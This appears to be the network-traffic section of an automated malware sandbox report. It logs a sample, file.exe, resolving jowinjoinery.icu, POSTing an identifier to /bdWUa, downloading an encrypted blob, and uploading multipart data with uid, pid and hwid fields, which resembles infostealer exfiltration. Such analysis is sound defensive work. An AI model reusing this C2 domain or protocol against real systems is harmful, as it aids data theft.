Mar 10, 2025 21:05:15.754995108 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:15.755002022 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:16.693027020 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:16.693368912 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:17.001061916 CET | 49716 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:17.001110077 CET | 443 | 49716 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:17.001205921 CET | 49716 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:17.001635075 CET | 49716 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:17.001647949 CET | 443 | 49716 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:18.783200026 CET | 443 | 49716 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:18.783284903 CET | 49716 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:18.786231041 CET | 49716 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:18.786243916 CET | 443 | 49716 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:18.786462069 CET | 443 | 49716 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:18.787863970 CET | 49716 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:18.788003922 CET | 49716 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:18.788053989 CET | 443 | 49716 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:19.972203970 CET | 443 | 49716 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:19.972546101 CET | 49716 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:20.767318964 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:20.767370939 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:20.767442942 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:20.767843962 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:20.767858982 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.635689020 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.636182070 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.637310982 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.637331963 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.637614965 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.687632084 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.709105968 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.709105968 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.709259987 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.709414959 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.709475040 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.709749937 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.709979057 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.710416079 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.710448027 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.710659027 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.710700989 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.712620020 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.712651968 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.712670088 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.712739944 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.712846041 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.712891102 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.712982893 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.717205048 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.717242002 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.717284918 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.717299938 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.717354059 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.717359066 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.717396975 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.717479944 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:22.717514992 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:22.717556000 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:26.155155897 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:26.155313015 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:26.155443907 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:26.155468941 CET | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:26.259218931 CET | 49718 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:26.259279966 CET | 443 | 49718 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:26.259891987 CET | 49718 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:26.260287046 CET | 49718 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:26.260302067 CET | 443 | 49718 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:28.038204908 CET | 443 | 49718 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:28.038363934 CET | 49718 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:28.039824963 CET | 49718 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:28.039850950 CET | 443 | 49718 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:28.040117025 CET | 443 | 49718 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:28.041418076 CET | 49718 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:28.041450024 CET | 49718 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:28.041496038 CET | 443 | 49718 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:28.798938036 CET | 443 | 49718 | 188.114.97.3 | 192.168.2.5
                                                            Mar 10, 2025 21:05:28.801923990 CET44349718188.114.97.3192.168.2.5
                                                            Mar 10, 2025 21:05:28.801989079 CET49718443192.168.2.5188.114.97.3
                                                            Mar 10, 2025 21:05:28.802074909 CET49718443192.168.2.5188.114.97.3
                                                            Mar 10, 2025 21:05:28.802095890 CET44349718188.114.97.3192.168.2.5
                                                            Mar 10, 2025 21:05:28.802109003 CET49718443192.168.2.5188.114.97.3
                                                            Mar 10, 2025 21:05:28.802114964 CET44349718188.114.97.3192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 10, 2025 21:04:45.013355017 CET | 50343 | 53 | 192.168.2.5 | 1.1.1.1
Mar 10, 2025 21:04:45.025105000 CET | 53 | 50343 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 10, 2025 21:04:45.013355017 CET | 192.168.2.5 | 1.1.1.1 | 0xf1b8 | Standard query (0) | jowinjoinery.icu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 10, 2025 21:04:45.025105000 CET | 1.1.1.1 | 192.168.2.5 | 0xf1b8 | No error (0) | jowinjoinery.icu | (none) | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Mar 10, 2025 21:04:45.025105000 CET | 1.1.1.1 | 192.168.2.5 | 0xf1b8 | No error (0) | jowinjoinery.icu | (none) | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                            • jowinjoinery.icu
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | 8384 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 20:04:46 UTC | 266 | OUT | POST /bdWUa HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 49
                                                            Host: jowinjoinery.icu
2025-03-10 20:04:46 UTC | 49 | OUT | Data Raw: 75 69 64 3d 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 26 63 69 64 3d
                                                            Data Ascii: uid=926e8c517364f11da70baa0a46e427522f26cc6d&cid=
2025-03-10 20:05:07 UTC | 786 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 10 Mar 2025 20:05:06 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 14134
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAvGpAhUfdS8FdzlQMn%2FBzXEwQBNIeo9kWOUxPh5MI4nK1iqicLw6hgljeh%2BnpUeAo6gBipyS5Q4WNRaMjKqjSF72VQxKTkgaC3Zw%2Bk6x4rhmvVScPcPpEq9BO5FN%2FABbFT4"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91e56c51bc3bc948-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=27169&min_rtt=5601&rtt_var=17425&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=951&delivery_rate=484038&cwnd=235&unsent_bytes=0&cid=ada95db410b2220c&ts=20432&x=0"
2025-03-10 20:05:07 UTC | 583 | IN | Data Raw: 82 b4 f7 53 41 30 76 cc 52 26 33 fa 2f 29 21 e2 20 a7 7e 14 8e 53 19 94 1d 57 fc ea 01 57 7f e3 e2 80 7e 03 9d 81 2c 94 67 7b 3e fa 1e d6 b8 e9 6b 11 c7 a3 7d 8d 64 d8 96 06 fb 96 c6 03 64 fd 77 98 9f 1a f8 cf 90 f3 60 fa a4 8d e5 20 41 e9 49 4c 48 8f ad f0 d6 dc 20 2c be f3 48 ab 74 45 ab 96 a1 23 f9 18 18 57 30 f5 74 0c bb a7 88 41 b5 05 95 0c 71 36 ac 05 c9 c7 0b db 23 74 17 e2 a2 5d e8 b4 cb a4 25 e5 6c 89 61 e7 91 d7 c3 2e 44 71 97 86 fe 4c 04 de da 6d 86 88 de 60 1a b9 89 81 f6 85 0a 23 cd 5d 2e ba ae ae 8d 01 f5 ff 89 7f 37 aa dd 45 64 36 44 4c c1 7e 29 87 fd 15 ee d6 e8 2f ec 4c 90 7b 2a b7 59 7f e7 fd 64 ed 38 5f 7c 6f d5 33 14 8c 24 df 09 31 ff 9e 95 20 c6 62 87 ab de 28 d0 2b f2 d1 3a 24 59 ff f1 ed 52 4c 10 70 8d 2e 7c 5f e3 dc 94 b6 2b b1 f1
                                                            Data Ascii: SA0vR&3/)! ~SWW~,g{>k}ddw` AILH ,HtE#W0tAq6#t]%la.DqLm`#].7Ed6DL~)/L{*Yd8_|o3$1 b(+:$YRLp.|_+
2025-03-10 20:05:07 UTC | 1369 | IN | Data Raw: 80 ef e7 92 2d 7a a0 99 15 84 55 20 42 e8 53 7f b6 29 3c 9c 64 fd a0 df 81 42 32 46 b3 0c dd 35 d5 a2 43 ea 3b 69 d2 6c 98 3f ea 3d f7 f8 a3 53 72 75 db f9 98 0b 89 13 bc 3d 3a e0 f1 8b 95 13 11 3a e8 63 0f 09 50 7f 8a 60 6a 47 ee 1d 6b 95 74 ef 02 fc 0c 0d 41 14 b9 80 35 76 0e fe b9 07 2b 61 0b 6a d2 5c 50 b1 d3 67 f6 f9 c4 e2 80 15 8a f0 2c 18 77 c3 19 f2 17 0e b4 48 40 d1 56 f1 a2 ce 49 ad 12 7d cf 5d 82 c0 84 0c f1 b2 a9 8b 11 33 11 29 27 dc 46 67 8a 3e 3e 3f 76 9b c2 e9 45 30 c1 e5 81 64 0c 49 89 d4 8f 3a bd 3b 3b d0 dc 36 15 e3 6f a9 24 2c a7 6b 14 9f d5 51 f5 15 fc 53 bf d7 f4 ee ab db 20 70 9c 8c fe 8f 1d 0a 95 d8 23 64 1e 82 6d ff 87 93 3b b3 90 7f 4e d3 b2 99 71 49 5f 32 49 3e ed 3f bd 9b 1e 74 f6 20 5a 19 50 ef 9b b1 95 05 56 56 75 56 0b f4 b1
                                                            Data Ascii: -zU BS)<dB2F5C;il?=Sru=::cP`jGktA5v+aj\Pg,wH@VI}]3)'Fg>>?vE0dI:;;6o$,kQS p#dm;NqI_2I>?t ZPVVuV
2025-03-10 20:05:07 UTC | 770 | IN | Data Raw: 5b 8d 28 c3 f5 07 4d 00 0f fc 34 1e a9 40 d9 15 54 a7 8c 77 72 7e 2a 72 77 3a 7f af c8 6c 03 b5 9b 27 f0 5d d5 8c f8 b9 a6 4f bd b4 92 f1 7b 03 24 ac 9a e9 3d a5 ff c6 fe 01 cd 5e 76 71 0a f9 b3 1e ef bd 41 da ae 17 7d 9d 12 3f 82 d3 e5 c0 c6 9b 9f fd 3f 42 c2 ee af 63 08 75 9b 18 b1 a8 c3 14 24 6c 55 4f f2 69 d6 ac f3 86 fb ec 4c 1a 95 98 9b 41 d8 11 c7 e1 74 a4 f2 3c 13 dc 87 53 36 94 8b a3 7b fd b6 5c b0 8f 7a 52 38 cb 39 0f 05 4e 5b 5d 86 83 34 ae dc 5e 06 15 8d 2a 10 cd c1 ec de 96 6e 09 d1 d6 00 ec a5 a5 ae 94 aa a3 c9 3b f0 f2 98 71 8a 3b f0 0d 0b e1 0f ea f2 cd fb 3a b2 ea 6d 98 28 d6 9b bf 89 bc b5 ba 6f 03 d5 57 7b 1d 34 de ce 6d a9 13 d5 87 f4 1f 51 42 2f 89 b7 1a 49 89 4a 5f 81 5e bd 3c 45 e9 a8 3a de 9f 0d 4c 4e 73 03 8f ee ad 62 20 1a b0 fd
                                                            Data Ascii: [(M4@Twr~*rw:l']O{$=^vqA}??Bcu$lUOiLAt<S6{\zR89N[]4^*n;q;:m(oW{4mQB/IJ_^<E:LNsb
2025-03-10 20:05:07 UTC | 1369 | IN | Data Raw: 80 f8 eb d6 6d 5e 5b 21 ea 5a ae 3b 60 59 0d 67 da a1 fd d8 6b 0d 4f 0d ab 8d e9 41 fa a3 f7 67 96 c7 65 24 50 9f 50 4e fe 99 31 17 82 b9 40 85 d5 d1 cb ee ea 6c fb 56 ec 99 12 ad 4e ce e6 d4 1d 4f 64 2d 8d 7f 3c 62 b8 80 c9 c0 cd 11 19 00 f4 ec bc a8 9b 9c 49 08 11 72 7e a0 ba 44 69 5b 35 99 d7 ed 92 4e 9f 7a 86 00 26 f1 66 bd e8 8d 77 f5 f1 15 cc 52 29 cc e4 33 6a 2a 07 2b f1 69 ad 60 fe 7a d9 8e 91 ed 61 f0 68 bb 5b 2a 50 ae f8 37 92 80 f5 18 0d 2a cf 80 17 f1 3b 34 40 0b e5 bc a5 67 3b 30 8c 5b d6 97 94 28 06 05 89 03 d4 6b 15 de 9b 85 d5 f6 30 61 28 29 6e 2e 3e b8 b8 7a f0 3d 1c ec 55 3f 2a b4 94 11 50 c6 79 f2 e0 69 48 d2 05 01 ef f1 aa e0 cb ba e3 17 09 18 78 a4 e6 7f 19 38 dd 67 36 73 1e 23 db e3 4a 60 8e 34 7f fd 65 30 70 ba 32 8d 53 f3 c9 19 de
                                                            Data Ascii: m^[!Z;`YgkOAge$PPN1@lVNOd-<bIr~Di[5Nz&fwR)3j*+i`zah[*P7*;4@g;0[(k0a()n.>z=U?*PyiHx8g6s#J`4e0p2S
2025-03-10 20:05:07 UTC | 1369 | IN | Data Raw: d1 38 6c c1 f6 26 22 bf 8f 74 1b 01 92 ec ec 8c 7a 29 d0 ea db 3a 4c 7d 92 92 0e 12 32 a9 63 de 6a e4 35 40 bf cc 18 6d 31 e5 67 df 5f b0 7d 90 54 65 a0 79 fd b4 31 1d e1 d1 de 2b 49 58 8f ef 67 4f df 61 d6 de 34 a2 bd 6e 0f c4 a5 32 b0 d6 5b 43 3e ef 76 85 ee 10 1b 8f d6 aa 0d 4d 2b e1 8e 08 5a 74 4c 3d c0 78 0a cc 89 80 14 6f 6b 43 f8 13 6a 74 3f 8d 49 56 a9 0e 70 b4 40 a2 d5 d7 f6 8d 87 6a b9 97 cf 59 7d 41 dc 44 ad a5 9e cb 7d 93 1e c4 c4 b0 c8 e3 94 c7 8e 86 e6 e9 88 3e 38 a8 3a ab 14 9a 01 a3 fe be 2c f7 be 4c ea 82 12 9e a8 91 a3 3b 48 2d 2f 4a 1e 87 fe 6e df e3 57 88 d8 69 b6 53 3b 37 2d 7f 32 d9 81 8e a9 c1 1c dc 30 a2 94 69 07 80 c7 8b ec 10 01 dc 98 ad 30 ca e4 cb bc 3b f3 f1 a1 22 ca a6 2f 33 83 e9 b2 1f 6d 81 cc 74 c5 8d 74 5c 00 95 d9 db ba
                                                            Data Ascii: 8l&"tz):L}2cj5@m1g_}Tey1+IXgOa4n2[C>vM+ZtL=xokCjt?IVp@jY}AD}>8:,L;H-/JnWiS;7-20i0;"/3mtt\
2025-03-10 20:05:07 UTC | 1369 | IN | Data Raw: 1f e0 d4 c3 9c 19 22 15 16 26 37 26 ea f5 e6 70 58 60 18 49 ea a2 b6 94 68 46 0c 67 08 fa d6 08 bb f5 7d 2a 19 6a 37 f2 a4 64 d1 85 63 e1 64 a7 34 fb 19 b6 78 4a 41 85 9f 47 05 a7 eb 80 dc de a3 2e b3 04 d8 ea 8b 84 88 18 e4 67 46 5b 53 0e ca 91 fe 2f 3d 99 00 ec f9 f8 ea 11 2f a7 be e9 05 83 c4 43 57 ed 38 06 9a bb 42 13 4a fd f7 86 8d 4c 1e f6 8e 1b 4e f6 2f dc a4 52 0a f8 6c 0e 60 35 f6 67 df 11 d2 ca 75 e2 e8 3e ca 45 52 b7 1b 46 91 ab 1f be 27 f0 34 f4 1f 34 ce 93 fe 4b 60 b2 21 7f 61 55 9d 0b 0a 7d a2 1d b4 77 05 b2 88 7a 17 7e 0e 91 74 a3 68 7a 89 78 db 55 1b e1 b2 07 f2 cc 5e 5a 41 78 45 6e 63 12 4c 2e eb ac ca f1 7f 27 75 d0 a1 24 3d fc d7 cf dc e7 bd af 65 e8 44 70 8f 20 87 91 61 88 4f 4a bf 55 c9 16 7d d2 fd 9b 43 00 cf 22 33 80 8c 25 8c 92 14
                                                            Data Ascii: "&7&pX`IhFg}*j7dcd4xJAG.gF[S/=/CW8BJLN/Rl`5gu>ERF'44K`!aU}wz~thzxU^ZAxEncL.'u$=eDp aOJU}C"3%
2025-03-10 20:05:07 UTC | 1369 | IN | Data Raw: 41 30 0f c7 4c aa 47 03 30 b6 7f 8e 90 21 34 20 df 72 75 88 c7 26 c6 0e 40 ec b3 2f 1b 8a 0b f7 58 f8 7f e4 f3 a5 1f 48 6f 1b 41 82 6d 2c 7d 30 8f 01 54 15 d0 ae 37 76 45 90 95 c2 13 f9 51 af 97 a2 5e 2b 1d 24 09 0f ee bb 20 4d dc 8d d0 85 18 c0 a9 70 59 06 60 9f fd c5 1b c2 f4 4d 20 b7 9c ab ca 42 f5 f5 e3 a0 96 78 e4 4a e8 73 d1 95 72 30 1b 50 bb f6 f2 58 3e 50 6c d0 67 c6 a4 de e8 60 7f f6 08 39 f3 c4 2b 61 3e 07 cb a2 27 2e f5 4b b8 1f 65 be e3 1d 9f 4a f8 6b a1 66 af 20 62 22 8f 56 ad 95 b8 92 0a b4 27 ac dc ae 80 ac a6 8f 8a d0 b4 5e 7b 87 f5 75 b1 46 da 74 b9 01 f1 7e de c9 8b 24 a5 e5 10 e0 1d ec fd 8d 62 88 a7 8a 0d 1b 93 d2 ef 63 c8 5f 90 7a 26 50 60 1a 43 62 61 c4 83 b8 55 11 87 a0 9f a8 bc 15 37 f6 ae fb 55 57 be 75 d5 c3 cf 7b a4 81 25 5e 2b
                                                            Data Ascii: A0LG0!4 ru&@/XHoAm,}0T7vEQ^+$ MpY`M BxJsr0PX>Plg`9+a>'.KeJkf b"V'^{uFt~$bc_z&P`CbaU7UWu{%^+
2025-03-10 20:05:07 UTC | 1369 | IN | Data Raw: b5 24 2e 08 09 a6 03 90 f5 01 2b 23 56 70 bd 90 18 38 a9 5b 49 df 7e bd 8a cd 78 31 d1 af 4a 3e 2b ce c0 e2 94 39 28 e9 f0 03 32 18 9c 69 3a 38 6e 16 48 a8 f7 27 bb ea 9b e3 3b cf c7 a6 28 ec 93 94 69 e2 9a 03 c6 d8 81 ea 99 c1 0c 1e 3a 5e 50 94 4f ed 74 48 4b 75 e1 bd 6e e7 17 8f 3c 37 0b 53 a1 28 13 65 9a 5a 4e 12 55 34 8d 4a d7 71 8d bf c8 d9 67 56 96 82 ed e4 82 58 2b 5c 5c dc 66 44 ff 74 b4 e5 45 d6 b6 f6 3c e8 2c 5c 3a 3a b8 48 af 7e d5 5f 43 7c 2c 28 97 94 82 8c 4e c6 db 12 4c d3 b1 a9 89 32 96 b7 e9 27 7b 6d 89 44 8a 53 67 6f e4 57 d9 23 4d 00 e7 41 98 0d e2 e5 33 2c c4 3b d8 4c d8 1e 54 a5 97 50 a5 de 4f 77 c7 a2 4f 10 e7 3a ec 8f 44 d1 27 db 63 e2 76 5b 76 d4 d5 07 41 9c d6 a8 f6 45 bf 09 bb 94 d6 99 59 85 a4 83 f0 29 9b a7 d4 26 3b 73 26 44 c6
                                                            Data Ascii: $.+#Vp8[I~x1J>+9(2i:8nH';(i:^POtHKun<7S(eZNU4JqgVX+\\fDtE<,\::H~_C|,(NL2'{mDSgoW#MA3,;LTPOwO:D'cv[vAEY)&;s&D
2025-03-10 20:05:07 UTC | 1369 | IN | Data Raw: bf d9 1b 4e 9e 32 62 6d c2 3b b2 a7 db 15 1c 5b b3 29 b5 ec 08 ea d0 a9 8c c8 73 b1 ca 9e 01 a2 09 63 d1 66 7c 6f 32 30 69 5b 98 db a8 83 fe 2a 3f 83 d7 45 04 11 5b 6d 61 fa b1 6b 4c 3d 41 d9 a2 ab 2c f7 9d f1 ef 76 a0 13 fd b7 fb 00 c1 1a 4d 67 cd b5 9f 44 2c 11 d5 eb 6b 2e 54 d9 db 9f 0c 59 ed ce 19 97 13 3f e4 41 4d 3a e0 7c a0 16 a7 fb 32 c5 4d 16 10 2b 5e 64 e4 39 c7 a9 55 71 51 90 72 68 5d 70 fc cf 4f 50 69 e4 71 03 e6 bd 7d b6 c6 86 a0 93 83 46 f7 53 45 88 0d 2d 87 66 8c b2 c2 15 4b 6a f7 ec c3 31 eb 9a 9a b2 01 c8 fc b4 8a 33 6c 34 d0 31 ce 19 42 8b dc de 56 54 23 e2 ac 14 5e 78 10 5f f1 ae 30 a6 ee 00 e0 c4 08 29 60 bb aa ba ed 4d c2 88 64 db 50 ab 2a b8 cd ce 63 ae 98 d1 fc 17 03 6d d9 d4 b1 98 a8 33 b2 e1 1d 21 ce ed df 33 c1 50 12 b4 a6 59 ef
                                                            Data Ascii: N2bm;[)scf|o20i[*?E[makL=A,vMgD,k.TY?AM:|2M+^d9UqQrh]pOPiq}FSE-fKj13l41BVT#^x_0)`MdP*cm3!3PY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | 8384 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 20:05:09 UTC | 276 | OUT | POST /bdWUa HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=ClI3W3kzbX
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 14881
                                                            Host: jowinjoinery.icu
2025-03-10 20:05:09 UTC | 14881 | OUT | Data Raw: 2d 2d 43 6c 49 33 57 33 6b 7a 62 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 43 6c 49 33 57 33 6b 7a 62 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 6c 49 33 57 33 6b 7a 62 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 34 34 43 45 41 35 45 46 32 31 37 45 33 45 44 43 45 41 37 37 38 33 36 38
                                                            Data Ascii: --ClI3W3kzbXContent-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--ClI3W3kzbXContent-Disposition: form-data; name="pid"2--ClI3W3kzbXContent-Disposition: form-data; name="hwid"D930444CEA5EF217E3EDCEA778368
2025-03-10 20:05:10 UTC | 811 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 10 Mar 2025 20:05:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JW7RXuc1N4ZXlLFlaTO6dAawruQTULaS05vQtw3347yw94RmSoWavwZOQyNsM59GS5RZkP2txFcS9J5dbg67HSO3bpkCMT5qg%2Bb5C75gFo2YpfgEtr9mJZ%2FVJRDFXY4H2heg"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91e56cdeac51e604-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9985&min_rtt=3887&rtt_var=11671&sent=12&recv=21&lost=0&retrans=1&sent_bytes=4232&recv_bytes=15815&delivery_rate=97148&cwnd=251&unsent_bytes=0&cid=4bcda8e066a971a4&ts=1119&x=0"
2025-03-10 20:05:10 UTC | 74 | IN | Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a
                                                            Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | 8384 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 20:05:12 UTC | 283 | OUT | POST /bdWUa HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=T65RXqd8bKyh522r7
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 15065
                                                            Host: jowinjoinery.icu
